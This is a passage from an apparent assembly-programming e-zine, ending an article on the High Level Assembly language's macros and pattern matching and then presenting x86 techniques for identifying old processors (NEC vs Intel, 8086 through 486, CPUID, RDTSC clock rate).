machine instruction in sight.  Of course, this is a trivial example;
nonetheless, I've managed to write reasonable HLA programs that were just
over
1,000 lines of code that contained only one or two identifiable machine
language instructions. If it's possible to do this, how can I get away with
calling HLA an assembly language?

The truth is, you can actually write a very similar looking program with
MASM.
Here's an example I trot out for unbelievers.  This code is compilable with
MASM (assuming you include the UCR Standard Library v2.0 and some additional
code I've cut out for brevity:

var
         enum colors,<red,green,blue>

         colors c1, c2

endvar


Main            proc
                 mov     ax, dseg
                 mov     ds, ax
                 mov     es, ax

                 MemInit
                 InitExcept
                 EnableExcept

                 finit

                 try

                       cout    "Enter two colors:"
                       cin     c1, c2
                       cout    "You entered ",c1," and ",c2,nl
                       .if       c1 == red

                           cout "c1 was red"

                        .endif

                    except  $Conversion
                       cout    "Conversion error occured",nl

                    except  $Overflow
                       cout    "Overflow error occured",nl

                 endtry
                 CleanUpEx
                 ExitPgm                 ;DOS macro to quit program.
Main            endp


As you can see, the only identifiable machine instructions here are the ones
that initialize the segment registers at the beginning of the program (which
is
unnecessary in a Win32 environment).  So let me blunt criticism from
"die-hard"
assembly fans right at the start:  HLA doesn't open up all kinds of new
programming paradigms that weren't possible before.  With some really clever
macros (e.g., enum, cout, and cin in the MASM code), it is quite possible to
do
some really amazing things.  If you're wondering why you should bother with
HLA
if MASM is so wonderful, don't forget my comments about the robustness of
these
macros.  Both HLA and MASM (with the UCR Standard Library v2.0) work great
as
long as you write perfect code and don't make any mistakes.  However, if you
do
make mistakes, the MASM macro scheme gets ugly real quick.

The "die-hard" assembly fan will probably make the observation that they
would
never write code like the MASM code I've presented above;  they would write
traditional assembly code.  They want to write traditional code.  They don't
want this high level syntax forced upon them.  Well, HLA doesn't force you
to
use high level control structures rather than machine instructions.  You can
always write the low level code if you prefer it that way.  Here is the
original HLA program rewritten to use familiar machine instructions:

program SampleHLApgm2;
#include( "stdlib.hhf" )

data
               dword 37, 37;
     TcHWpStr: dword;
               byte  "The classical 'Hello World' program: ",0,0,0;

               dword 11, 11;
     HWstr:    dword;
               byte  "Hello World",0;

begin SampleHLApgm2;

     lea( eax, TcHWpStr );
     push( eax );
     call stdout.puts;

     lea( eax, HWstr );
     push( eax );
     call stdout.puts;

     call stdout.newln;

end SampleHLApgm2;

The stdout.puts and stdout.newln procedures come from the HLA Standard
Library.
I will leave it up to the interested reader to translate these into Win API
Write calls if this code isn't sufficiently low level to satisfy.  Note that
HLA strings are not simple zero terminated strings like C/C++.  This
explains
the extra zeros and dword values in the DATA section (the dword values hold
the
string lengths; I offer these without further explanation, see the HLA
documentation for more details on HLA's string format).

One thing you've probably noticed from this second example is that HLA uses
a
functional notation for assembly language statements.  That is, the
instruction
mnemonics look like function calls in a high level language and the operands
look like parameters to those functions.  The neat thing about this notation
is
that it easily allows the use of "instruction composition."  Instruction
composition, like functional composition, means that you get to use one
instruction as the operand of another.  For example, an instruction like
"mov(
mov( 0, eax ), ebx );" is perfectly legal in HLA.  The HLA compiler will
compile the innermost instruction first and then substitute the destination
operand of the innermost instruction for the operand position occupied by
the
instruction.  HLA's MOV instruction takes the generic form "MOV( source,
destination );" so the former instruction translates to the following two
instruction sequence:

     mov( 0, eax );      // intel syntax:   mov eax, 0
     mov( eax, ebx );  // intel syntax:   mov ebx, eax

By and of itself, instruction composition is somewhat interesting, but
programmers striving to write readable code need to exercise caution when
using
instruction composition.  It is real easy to write some really unreadable
code
if you abuse instruction composition.  E.g., consider:

     mov( add( mov( 0, eax ), sub( ebx, ecx)), edx ), mov( i, esi ));


Egads!  What does this mess do?  Some might consider the inclusion of
instruction composition in HLA to be a fault of the language if it allows
you
to write such unreadable code.  However, I've never felt it was the language
syntax's job to enforce good programming style.  If there's really a reason
for
writing such messy code, the compiler shouldn't prevent it.

Although you can produce some truly unreadable messes with instruction
composition, if you use it properly it can enhance the readability of your
programs.  For example, HLA lets you associate an arbitrary string with a
procedure that HLA will substitute for that procedure name when the
procedure
call appears as an operand of another instruction.  Most functions that
return
a value in a register specify that register name as their "returns" string
(the
string HLA substitutes for the procedure call).  For example, the "str.eq(
str1, str2)" function compares the two string operands and returns true or
false in AL depending on the result of the comparison.  This allows you to
write code like the following:

     if( str.eq( str1, "Hello" )) then

         stdout.put( "str1 = 'Hello'" nl );

     endif;

HLA directly translates the IF statement into the following sequence:

     str.eq( str1, "Hello" );
     if( al ) then

         stdout.put( "str1= 'Hello'" nl );

     endif;

(If a register name appears where a boolean expression is expected, as AL
does
in the IF statement above, HLA emits a TEST instruction to see if the
register
contains a non-zero value.)

Arguably, the former version is a little more readable than the latter
version.
Instruction composition, when you use it in this fashion, lets you write
code
that "looks" a little more high level without the compiler having to
generate
lots of extra code (as it would if HLA supported a generalized arithmetic
expression parser).

Like MASM, HLA supports a wide variety of high level control structures.
HLA's
set is both higher level and lower level at the same time.  There are two
reasons HLA's control structures aren't always as powerful as MASM's.
First,
with the sole exception of object method invocations, I made a rule that
HLA's
high level control structures would not modify any general purpose registers
behind the programmer's back.  MASM, for example, may modify the value in
EAX
for certain boolean expressions it must compute.  Second, remember that the
primary goal of HLA is to teach assembly language; yes, it's supposed to
ease
the learning curve, but still the goal is to teach assembly language.  It is
possible to get carried away with the high level language features and then
wind up with an "assembler" that lets students write their assembly language
programs in a high level language.  In my opinion, MASM went too far with
what
it allows for boolean expressions.  HLA, for example, doesn't allow the use
of
the conjunctive and disjunctive operators ( "&&" and "||") in boolean
expressions.  I expect my students to generate the appropriate sequence of
low
level instructions themselves.  In general, most HLA boolean expressions
compile into two instructions: a CMP and a conditional jump.  I didn't want
to
go any farther than this because that would allow the students to avoid
learning how to write this code for themselves.

Although I designed HLA as a tool to teach assembly language programming,
this
is also a tool that I intend to use so I included lots of goodies for
advanced
assembly language programmers.  For example, HLA's macro facilities are more
powerful than I've seen in any programming language based macro processor.
One
unique feature of HLA's macro preprocessor is the ability to create "context
free" control structures using macros.  For example, suppose that you decide
that you need a new type of looping construct that HLA doesn't provide;
let's
say, a loop that will repeat once for each character in a string supplied as
a
parameter to the loop.  Let's call this loop "OnceForEachChar"  and decide
on
the following syntax:

     OnceForEachChar( SomeString )

         << Loop Body >>

     endOnceForEachChar;

On each iteration of this loop, the AL register will contain the
corresponding
character from the string specified as the OnceForEachChar operand.  You can
easily implement this loop using the following HLA macro:

macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;

     pushd( -1 );      // index into string.

     TopOfLoop:
        inc( (type dword [esp] ));    // Bump up index into string.
        #if( @IsConst( SomeString ))

             lea( eax, SomeString );  // Load address of string constant
    into EAX.

         #else

             mov( SomeString, eax );  // Get ptr to string.

         #endif
         add( [esp], eax );           // Point at next available
   character
         mov( [eax], al );            // Get the next available character
         cmp( al, 0 );                // See if we're at the end
   of the string
         je LoopExit;

terminator endOnceForEachChar;

         jmp TopOfLoop;      // Return to the top of the loop and repeat.
LoopExit:
         add( 4, esp );      // Remove index into string from stack.

endmacro;


Anyone familiar with MASM's macro processor should be able to figure out
most
of this code.  Note that the symbols "TopOfLoop" and "LoopExit" are local
symbols to this macro.  Hence, if you repeat this macro several times in the
code, HLA will emit different actual labels for these symbols to the MASM
output file.  The "@IsConst" is an HLA compile-time function that returns
true
if its operand is a constant.  Obtaining the address for a constant is
fundamentally different than obtaining the address of a string variable
(since
HLA string variables are actually pointers to the string data).  The most
interesting feature of this macro definition is the "terminator" line.  This
actually defines a second macro that is active only after HLA encounters the
"OnceForEachChar" macro and control returns to the first statement after the
OnceForEachChar invocation.  Invocation of "context free" macros always
occur
in pairs;  that is, for every "OnceForEachChar" invocation there must be a
matching "endOnceForEachChar" invocation.  The following program
demonstrates
this macro in use, it also demonstrates that you can nest this newly created
control structure in your program:


program SampleHLApgm3;
#include( "stdlib.hhf" )

macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;

     pushd( -1 );      // index into string.

     TopOfLoop:
         inc( (type dword [esp] ));
        #if( @IsConst( SomeString ))

             lea( eax, SomeString );

         #else

             mov( SomeString, eax );

         #endif
         add( [esp], eax );
         mov( [eax], al );
         cmp( al, 0 );
         je LoopExit;

terminator endOnceForEachChar;

         jmp TopOfLoop;
LoopExit:
         add( 4, esp );

endmacro;


static
     strVar: string := ":" nl;

begin SampleHLApgm3;

     OnceForEachChar( "Hello" )

         stdout.putc( al );
         OnceForEachChar( strVar )

             stdout.putc( al );

         endOnceForEachChar;

     endOnceForEachChar;


end SampleHLApgm3;


This program produces the output:

H:
e:
l:
l:
o:



Here's the MASM code the compiler emits for the sequence above (the
"strings"
segment was moved for clarity):

strings         segment page public 'data'
                 align   4
?635_len        dword   5
         dword   5
?635_str        byte    "Hello",0,0,0
strings         ends



                 pushd   -1

?634__0278_:
                 inc     dword ptr [esp+0]       ;(type dword [esp])
                 lea     eax, ?635_str
                 add     eax, [esp+0] ;[esp]
                 mov     al, [eax+0] ;[eax]
                 cmp     al, 0
                 je      ?636__0279_
                 push    eax
                 call    stdio_putc      ;putc
                 pushd   -1

?639__027d_:
                 inc     dword ptr [esp+0]       ;(type dword [esp])
                 mov     eax, dword ptr ?630_strVar[0] ;strVar
                 add     eax, [esp+0] ;[esp]
                 mov     al, [eax+0] ;[eax]
                 cmp     al, 0
                 je      ?640__027e_
                 push    eax
                 call    stdio_putc      ;putc
                 jmp     ?639__027d_

?640__027e_:
                 add     esp, 4
                 jmp     ?634__0278_

?636__0279_:
                 add     esp, 4


In addition to the "terminator" clause, HLA macros also support a "keyword"
clause that let you bury reserved words within a context-free language
construct.  For example, the HLA language does not provide a SWITCH/CASE
statement.  This omission was intentional.  Rather than build the
SWITCH/CASE
statement into the HLA language, I implemented the SWITCH .. CASE .. DEFAULT
..
ENDCASE statement using HLA's macro facilities (as a demonstration of HLA's
power).  An HLA SWITCH statement takes the following form:

switch( reg32 )

   case( constantList1 )
       << statements >>

   case (constantList2 )
       << statements >>
           .
           .
           .
   default  // This is optional
       << statements >>

endswitch;

The switch macro implements the "switch" and "endswitch" reserved words
using
the macro and terminator clauses in the macro declaration.  It implements
the
"case" and "default" reserved words using the HLA "keyword" clause in a
macro
definition.  The "keyword" clause is similar to the "terminator" clause
except
it doesn't force the end of the macro expansion in the invoking code.  The
actual code for the HLA SWITCH statement is a little too complex to present
here, so I will extend the example of the OnceForEachChar macro to
demonstrate
how you code use the "keyword" clause in a macro.

Let's suppose you wanted to add a "_break" clause to the "OnceForEachChar"
loop
( I'm using "_break" with an underscore because "break" is an HLA reserved
word).  You could easily modify the "OnceForEachChar" macro to achieve this
by
using the following code:

macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;

     pushd( -1 );      // index into string.

     TopOfLoop:
         inc( (type dword [esp] ));
        #if( @IsConst( SomeString ))

             lea( eax, SomeString );

         #else

             mov( SomeString, eax );

         #endif
         add( [esp], eax );
         mov( [eax], al );
         cmp( al, 0 );
         je LoopExit;

keyword _break;
         jmp LoopExit;

terminator endOnceForEachChar;

         jmp TopOfLoop;
LoopExit:
         add( 4, esp );

endmacro;


The "keyword" clause defines a macro ("_break") that is active between the
"OnceForEachChar" and "endOnceForEachChar" invocations.  This macro simply
expands to a jmp instruction that exits the loop.  Note that if you have
nested
"OnceForEachChar" loops and you "_break" out of the innermost loop, the code
only jumps out of the innermost loop, exactly as you would expect.

HLA's macro facilities are part of a larger feature I refer to as the "HLA
Compile-Time Language."  HLA actually contains a built-in interpreter than
executes while it is compiling your program.  The compile-time language
provides conditional compilation ( the #IF..#ELSE..#ENDIF statements in the
previous example), interpreted procedure calls (macros), looping constructs
(#WHILE..#ENDWHILE), a very powerful constant expression evaluator,
compile-time I/O facilities (#PRINT, #ERROR, #INCLUDE, and #TEXT..#ENDTEXT),
and dozens of built-in compile time functions (like the @IsConst function
above).

The HLA built-in string functions (not to be confused with the HLA Standard
Library's string functions) are actually powerful enough to let you write a
compiler for a high level language completely within HLA.  I mentioned
earlier
that it is possible to write an expression compiler within HLA;  I was
serious.
The HLA compile-time language will let you write a sophisticated recursive
descent parser for arithmetic expressions (and other context-free language
constructs, for that matter).

HLA is a great tool for creating low-level Domain Specific Embedded
Languages
(DSELs).  DSELs are mini-languages that you create on a project by project
basis to help reduce development time.  HLA's compile time language lets you
create some very high level constructs.  For example, HLA implements a very
powerful string pattern matching language in the "patterns" module found in
the
HLA Standard Library.  This module lets you write pattern matching programs
that use techniques found in language like SNOBOL4 and Icon.  As a final
example, consider the following HLA program that translate RPN (reverse
polish
notation) expressions into their equivalent assembly language (HLA)
statements
and displays the results to the standard output:

// This program translates user RPN input into an
// equivalent sequence of assembly language instrs (HLA fmt).

program RPNtoASM;

#include( "stdlib.hhf" );

static

     s:              string;
     operand:        string;
     StartOperand:   dword;


macro mark;

     mov( esi, StartOperand );

endmacro;

macro delete;

     mov( StartOperand, eax );
     sub( eax, esi );
     inc( esi );
     sub( s, eax );
     str.delete( s, eax, esi );

endmacro;

procedure length( s:string ); returns( "eax" ); nodisplay;
begin length;

     push( ebx );
     mov( s, ebx );
     mov( (type str.strRec [ebx]).length, eax );
     pop( ebx );

end length;


begin RPNtoASM;

     stdout.put( "-- RPN to assembly --" nl );
     forever

         stdout.put( nl nl "Enter RPN sequence (empty line to quit): " );
         stdin.a_gets();
         mov( eax, s );
         breakif( length( s ) = 0 );
         while( length( s ) <> 0 ) do

             pat.match( s );

                 // Match identifiers and numeric constants

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
                 pat.a_extract( operand );
                 stdout.put( "   pushd( ", operand, " );" nl );
                 strfree( operand );
                 delete;

               pat.alternate;

                 // Handle the "+" operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '+' );
                 stdout.put
                 (
                     "   pop( eax );" nl
                     "   add( eax, [esp] );" nl
                 );
                 delete;

               pat.alternate;

                 // Handle the '-' operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '-' );
                 stdout.put
                 (
                     "   pop( eax );" nl
                     "   pop( ebx );" nl
                     "   sub( eax, ebx );" nl
                     "   push( ebx );" nl
                 );
                 delete;

               pat.alternate;

                 // Handle the '*' operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '*' );
                 stdout.put
                 (
                     "   pop( eax );" nl
                     "   imul( eax, [esp] );" nl
                 );
                 delete;

               pat.alternate;

                 // handle the '/' operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '/' );
                 stdout.put
                 (
                     "   pop( ebx );" nl
                     "   pop( eax );" nl
                     "   cdq(); " nl
                     "   idiv( ebx, edx:eax );" nl
                     "   push( ebx );" nl
                 );
                 delete;

               pat.if_failure

                 // If none of the above, it must be an error.

                 stdout.put( nl "Illegal RPN Expression" nl );
                 mov( s, ebx );
                 mov( 0, (type str.strRec [ebx]).length );

             pat.endmatch;

         endwhile;

     endfor;

end RPNtoASM;


Consider for a moment the code that matches an identifier or an integer
constant:

        mark;
        pat.zeroOrMoreWS();
        pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
        pat.a_extract( operand );
        stdout.put( "   pushd( ", operand, " );" nl );
        strfree( operand );
        delete;

The "mark;" invocation saves a pointer into the "s" string where the current
identifier starts.  The pat.ZeroOrMoreWS pattern matching function skips
over
zero or more whitespace characters.  The pat.OneOrMoreCset pattern match
function matches one or more alphanumeric and underscore characters (a crude
approximation for identifiers and integer constants).  The pat.a_extract
function makes a copy of the string between the "mark" and the "a_extract"
calls (this corresponds to the whitespace and identifier/constant).  The
stdout.put statement emits the HLA machine instruction that will push this
operand on to the x86 stack for later computations.  The remaining
statements
clean up allocated string storage space and delete the matched string from
"s".

Although the "pat.xxxxx" statements look like simple function calls, there's
actually a whole lot more going on here.  HLA's pattern matching facilities,
like SNOBOL4 and Icon, support success, failure, and backtracking.  For
example, if the pat.oneOrMoreChar function fails to match at least one
character from the set, control does not flow down to the pat.a_extract
function.  Instead, control flows to the next "pat.alternate" or
"pat.if_failure" clause.  Some calls to HLA pattern matching routines may
even
cause the program to back up in the code and reexecute previously called
functions in an attempt to match a difficult pattern (i.e., the backtracking
component).  This article is not the place to get into the theory of pattern
matching;  however, these few examples should be sufficient to show you that
something really special is going on here.  And all these facilities were
developed using the HLA compile-time language.  This should give you a small
indication of what is possible when using the HLA compile time language
facilities.

The HLA language is far too rich to describe in this short article (the
*very*
rough documentation for the language is nearly 300 pages long).  For more
information, check out the on-line documentation for HLA at
http://webster.cs.ucr.edu.   Someday, you'll also be able to learn about HLA
via "The Art of Assembly Language Programming, HLA/Windows version." I will
keep interested individuals updated on the progress of AoA at the Webster
web
site.

HLA is totally free.  It is public domain software and there are no
restrictions on its use, the use of the HLA standard library, or the HLA
compiler source code.  Do whatever you want with it and have a lot of fun!

                           rhyde@...
                         http://webster.cs.ucr.edu
                    http://www.cs.ucr.edu/docs/webster/



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                              Processor Identification - Part
II
                                              by Chris Dragan & Chili


In the first part of this article I'll explain a lot of different ways to
check
for older processors by exploiting bugs, undocumented features, etc.  I'll
also
show how  to write an invalid-opcode  exception handler,  calculate the size
of
the prefetch queue and some other things. Finally, in the last part Chris
shows
how to determine the processor clockrate with the RDTSC instruction.

Chris didn't have much free time at the moment and so couldn't contribute
more,
therefore I had to put this article together pretty much myself, and I hope
the
quality didn't  go down very much  --  since Chris' texts are definitely
better
than mine.


AAD (ASCII Adjust before Division) Instruction
----------------------------------------------
This instruction allows  us to distinguish between at least  NEC's V-series
and
Intel processors. AAD, usually in preparation for a division using DIV or
IDIV,
works like this:

    AL = AH * 10 + AL
    AH = 0

Converting  the unpacked  two-digit BCD  number in AX  into binary.  Thus
being
"0d5h, 0ah" the normal opcode. The difference is that while Intel's chips
allow
one to  replace the multiplicand with  any number  (and by so building your
own
AAD  instruction for various  number systems),  NEC always encodes  it as 10
by
default.  So by replacing the second byte  with a different number, we can
then
check if the operand is actually used, and if not, assume it's a NEC.

                 mov     ax, 0f0fh
                 db      0d5h, 10h       ; opcode for AAD 16
                 cmp     al, 0ffh        ; check if multiplicand was 10 or
not
                 jz      _is_Intel
                 jnz     _is_NEC

This should  be used as another way  (in addition to  the one presented  in
the
first article on this subject)  to distinguish the NEC V20/V30  series from
the
Intel 8086/88.


PUSHA Instruction
-----------------
Here is  another good way to  differentiate NECs  from  Intel's 8086/88.
Since
V20 and V30 execute all the 80186 instructions  and knowing that PUSHA
executed
on the 8086/88 as "JMP $+2",  one can for example,  after executing it, set
the
carry flag  and then see  if it was  really set.

                 clc                     ; ensure that CF is clear
                 pusha                   ; executed on 8086/88 as JMP $+2
                 stc
                 jc      _is_NEC_or_186plus
                 jnc     _is_808x

                 <whatever code here>
                 .
                 .
                 .

_is_NEC_or_186plus:
                 popa                    ; clean up

Of course the carry flag must not already be set before performing this
test.


POP CS Trick
------------
I'll just show one last way of accomplishing the same.  The trick is that,
on a
8086/88 (non-CMOS versions, at least),  the opcode "0fh" will perform a POP
CS,
on a 186/88 is an invalid opcode,  generating an INT6 exception, while NECs
and
286+ use that encoding as a prefix byte,  to indicate new instructions.  So,
to
tell NEC's V20/V30 (also V40/V50, I think) and 8086/88 apart,  and knowing
that
with the byte string "0fh, 14h, 0c3h", the CPU will perform the following:

       8086/88                 V20/V30
       -------                 -------
    pop     cs              set1   bl, cl
    adc     al, 0C3h

It is then easy to write a piece of code that will distinguish between them:

                 xor     al, al          ; BTW: clears CF
                 push    cs
                 db      0fh, 14h, 0c3h  ; intruction(s) -- see above
                 cmp     al, 0c3h        ; check if ADC was executed
                 je      _is_808x
                 jne     _is_NEC_V20plus

                 <whatever code here>
                 .
                 .
                 .

_is_NEC_V20plus:
                 pop     ax              ; clean up (no POP CS available)

Note that, again, the carry flag must be cleared before execution of this
test.
Also,  just a reminder that this is to be used when you know that the
processor
is not a 186 or above but an older one.


Word Write
----------
On the 8086/88 (+ V20/V30),  when a word write is performed at offset 0ffffh
in
a segment,  one byte will be written at that offset and the  other at offset
0,
while an 80186 family  processor will write one byte at offset 0ffffh,  and
the
other,  one byte beyond the end of the segment (offset 10000h).  So all we
have
to do is test if it wraps around or not:

                 mov     ax, ds:[0ffffh]         ; save original bytes
                 mov     word ptr ds:[0ffffh], 0aaaah
                 cmp     byte ptr ds:[0], 0aah   ; did 2nd byte wrap around?
                 mov     ds:[0ffffh], ax         ; restore original bytes
                 je      _is_808x
                 jne     _is_8018x

Again, note that this should only be used for the specified processors.


Multi-Prefix Intructions
------------------------
The  standard  8086/88  processors have  a bug  such that  they loose
multiple
prefixes if an interrupt occurs, while CMOS versions do not, since this bug
was
fixed in the 80C86/C88 processors (NEC V20/V30 processors also do not have
this
bug  --  allowing the  following code  to also  be applicable  to them).  If
we
execute a string operation with a repeat prefix and also a segment override
for
long enough to be interrupted, then, if we are on a 8086/88 the REP prefix
will
be lost  when the instruction  is interrupted,  since on return,  only the
last
prefix  will be retained.  If instead,  we are on a low-power  consumption
CMOS
version, the code will successfully complete.

                 mov     cx, 0ffffh
                 sti
             rep lods    byte ptr es:[si]        ; sure to be interrupted
                 cli
                 jcxz    _not_standard_808x      ; check if REP was completed

                 <if here, then it's just a standard 8086/88>
                 .
                 .
                 .

Just in case you want to use a piece of  code like this without having to
worry
about that bug, here's how to get it work correctly every time (with
interrupts
enabled -- this time with MOVS):

do_REP:     rep movs    byte ptr es:[di], es:[si]       ; may be
interrupted!
                 jcxz    carry_on                        ; if not, carry on,
                 loop    do_REP                          ; else, complete REP
carry_on:


Invalid-Opcode Exception Handler (INT6)
---------------------------------------
From  the  80186  and  upwards,  all  processors  allow  one  to  implement
an
invalid-opcode  exception handler,  which gives us  a great way of  telling
the
families of CPUs apart.  All one does is,  hook the INT6 interrupt vector
with
our own handler  and see if some specific instructions  trigger an INT6 or
not.
With our handler we trap those  exceptions and then toggle a little flag,
that
show us the processor doesn't support that instruction.

In the  code below I  hooked the  INT6 vector  by changing  the IVT
(Interrupt
Vector Table) directly,  but one can also use DOS services for that, test
which
processor we're running on and after that restore things back to what they
were
before  (except registers,  place some push/pop code yourself according to
your
needs -- by the way, Robert Collins is a god!). Anyway, the code is pretty
much
self-explanatory:

         ; Hook INT6 -- set up our own handler
                 push    0                       ; point to IVT (0000:0000) -
(1
                 pop     es                      ;  byte saved thanks to
Chris!)
                 cli
                 lds     ax, es:[6*4]            ; get original handler
vector
                 mov     es:[6*4], offset INT6_handler   ; then, replace it
with
                 mov     es:[6*4+2], cs                  ;  our own handler
                 sti

         ; Test if processor is at least a 80186 -- Executes "SHL DX, 10"?
                 mov     cx, 1           ; set up invalid-opcode flag
                 shl     dx, 0ah
                 jcxz    unknown_CPU

         ; Test if processor is at least a 80286 -- Executes "SMSW DX"?
                 smsw    dx
                 jcxz    _is_80186

         ; Test if processor is at least a 80386 -- Executes "MOV EDX, EDX"?
                 mov     edx, edx
                 jcxz    _is_80286

         ; Test if processor is at least a 80486 -- Executes "XADD DL, DL"?
                 xadd    dl, dl
                 jcxz    _is_80386

                 <if here, then it's a 80486 or higher processor>
                 .
                 .
                 .

         ; Restore original INT6 handler address -- for all processors type!
                 cli
                 mov     es:[6*4], ax    ; restore original INT6 offset
                 mov     es:[6*4+2], ds  ; restore original INT6 segment
                 sti

                 <whatever code here>
                 .
                 .
                 .

         ; Our own INT6 handler
INT6_handler:
                 xor     cx, cx          ; toggle invalid-opcode flag
                 push    bp
                 mov     bp, sp
                 add     word ptr ss:[bp+2], 3   ; adjust  the return address
to
                                                 ;  after the invalid opcode
(3
                                                 ;  bytes for all)
                 pop     bp
                 iret

Note,  that for this code:  1) should only be used if you know the processor
is
at least  a 80186,  2) if you  fiddle with  the contents  of AX,  ES and DS
and
change them  before restoring the  original INT6 handler  don't forget to
first
save and then restore them!,  3) of course the code in the  INT6_handler
should
only be executed by means of an INT6!

Maybe a very small extra explanation is required regarding the INT6_handler.
We
need to adjust  the return address,  since when an invalid opcode  exception
is
issued the saved contents of CS and EIP (which are pushed onto the stack)
point
to the instruction  that generated the exception,  instead of the next one
(as
usually happens for other interrupts).


Instruction Prefetch Queue
--------------------------
16-bit  (ie. 8086s, 80186s, V30s)  processors have a prefetch  queue 6 bytes
in
size and replenish the  instruction queue after having at least two bytes
empty
in the queue, while their 8-bit bus versions (ie. 8088s, 80188, V20s) only
have
a 4 byte prefetch queue and  initiate the prefetch cycle when there is at
least
one empty byte in it.

So,  knowing this about their Bus Interface Unit design,  it isn't difficult
to
write some code to distinguish between the two categories. We'll make a
routine
that uses self-modifying  code to change the opcode at the fifth  byte and
then
see if it was executed or not.

                 xor     cx, cx
                 cli                     ; prevent against queue being
emptied
                 lea     di, patch
                 mov     al, 90h         ; load NOP opcode
                 stosb                   ; patch fifth byte to a NOP
                 nop
                 nop
                 nop
                 nop
patch:          inc     cx              ; did the INC execute?
                 sti
                 jcxz    _is_8bit

                 <if here, then it's an 16-bit processor>

I believe there is enough time for the prefetch queue to fill, though I have
no
chance to confirm it!

Just in  case you want to be on the safe side,  here's a routine that will
most
certainly work:

                 xor     dx, dx
                 cli                     ; prevent against queue being
emptied
                 lea     di, patch+2
                 mov     al, 90h         ; load NOP opcode
                 mov     cx, 3
                 std
                 rep     stosb           ; patch fifth byte to a NOP
                 nop
                 nop
                 nop
                 nop
patch:          inc     dx              ; did the INC execute?
                 nop
                 nop
                 sti
                 test    dx, dx
                 jz      _is_8bit

                 <if here, then it's an 16-bit processor>

Again,  I must stress  that this  code should  only be used  for the
specified
processors, since it will without a doubt fail on others.


Do It The Optimized Way!
------------------------
Here is  our size-optimized  way of  determining  the processor  type.  It's
an
algorithm that  uses Intel's  guidelines  and tests  between pre-80286,
80286,
80386, 80486 without CPUID and 80486+ with CPUID support.

Chris is using a similar routine in his CPU identification utility.

         ; Detection of pre-80286/80286/386+ processors
                 mov     ax, 7202h       ; set bits 12-14 and clear bit 15
                 push    ax
                 popf
                 pushf
                 pop     ax

                 test    ah, 0f0h
                 js      _is_pre286      ; bit 15 of FLAGS is set on pre-286
                 jz      _is_80286       ; bits 12..15 of FLAGS are clear on
286
                                         ;  processor in real mode  (no V86
mode
                                         ;  on 286)

                 ; <if here, then it's a 80386 or higher processor>

         ; Detection of 80386/80486(w/out CPUID)/80486+(CPUID compliant)
                 pushfd
                 pop     eax
                 mov     edx, eax
                 xor     eax, 00240000h  ; flip bits 18 (AC) and 21 (ID)
                 push    eax
                 popfd
                 pushfd
                 pop     eax

                 xor     eax, edx        ; check if both bits didn't toggle
                 jz      _is_80386
                 shr     eax, 19         ; check if only bit 18 toggled
                 jz      _is_80486_without_CPUID

                 <if here, then it's a 80486 with CPUID or higher processor>

And so, we got the whole code down to a measly 46 bytes!


CR0 Register - Bit 4
--------------------
The 80386 DX may be differentiated from the other models by trying to clear
bit
4 (ET) in  the CR0 register.  It can be  toggled on  the 80386 DX,  while it
is
hardwired to 1  on any of the other family models.  So this gives us a good
way
to  differentiate them,  by trying to clear  that bit  and then  see if it
got
forced to set or not.

         ; Test CR0 register -- bit 4 (ET)
                 mov     eax, cr0
                 mov     edx, eax        ; save original CR0
                 and     al, 11101111b   ; clear bit 4
                 mov     cr0, eax
                 mov     eax, cr0
                 mov     cr0, edx        ; restore original CR0
                 test    al, 00010000b   ; check if bit 4 was forced high
                 jz      _is_a_80386DX_model
                 jnz     _is_not_a_80386DX_and_therefore_is_some_other_model

Note that I'm not  sure if this can safelly/trustfully  be done under
protected
mode!


Clockrate
---------
Before  Pentium,  it was difficult  to determine  the processor  clockrate.
It
typically  based on sophisticated timing  loops,  which were often
unreliable.
With Pentium,  Intel  introduced RDTSC  instruction,  which returned  number
of
clocks since the processor start. The following code illustrates how to use
it.

         ; Determine RDTSC support (assuming that CPUID is supported)
                 mov     eax, 1
                 cpuid
                 test    edx, 10h        ; bit 4 is set when RDTSC is
supported
                 jz      _no_rdtsc

         ; Disable all interrupts but timer IRQ0
                 in      al, 21h
                 mov     ah, al
                 in      al, 0A1h
                 push    ax              ; Save previous values
                 mov     al, 0FEh
                 out     21h, al
                 mov     al, 0FFh
                 out     0A1h, al

         ; Assuming that timer runs at 55ms periods, get the clockrate
                 hlt                     ; Wait for timer
                 rdtsc                   ; Read TSC
                 mov     ebx, eax        ; Save lo
                 mov     ecx, edx        ; Save hi
                 hlt                     ; Wait for timer
                 rdtsc                   ; Read TSC
                 sub     eax, ebx        ; Difference lo
                 sbb     edx, ecx        ; Difference hi

         ; Calculate clockrate in MHz
                 mov     ecx, 54925
                 div     ecx
                 mov     [Clockrate], eax

         ; Restore interrupt states
                 pop     ax
                 out     0A1h, al
                 mov     al, ah
                 out     21h, al

The above code can be run in real mode, V86 mode or protected mode in ring0.
In
V86  mode it  will  hang  Pentium and  Pentium  MMX  processors,  but on
other
processors it will work OK.

In this code,  clockrate is determined as:  (T2-T1)*PIT/(D*M),  where T1 and
T2
are  numbers of  clocks returned  by RDTSC,  PIT is  the value divided  in
the
Programmable Interval Timer  (equals 0x1234DD),  D is the value by which PIT
is
divided (0x10000) and M is 1000000 (we want it in MHz).


Is This The End?
----------------
I think  this is the end as  old CPUs are concerned,  since a lot of
techniques
have already been covered here (though there are some more),  but not for
other
processors,  like AMD and IBM and whatever else Chris and I think up before
the
next article.

Take the time to visit Chris' web page,  where you can find  the source for
his
CPU identification utility (for Netwide Assembler). His place is at:
         http://ams.ampr.org/cdragan/

Also,  here are some other sources of information that you might want to
take a
look at (available somewhere on the net  --  since I don't remember where I
got
them from):

         WHATCHIP.ASM                           (Christy Gemmell)
         86BUGS.LST                             (Harald Feldmann/Hamarsoft)
            [distributed with Ralf Brown's Interrupt list]
         OPCODES.LST                            (Potemkin's Hackers Group)
